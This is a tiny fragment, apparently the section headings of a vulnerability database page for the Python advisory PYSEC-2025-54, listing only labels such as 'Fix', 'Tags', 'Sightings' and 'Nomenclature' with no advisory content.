Fix

PYSEC-2025-54

Tags

Sightings

Nomenclature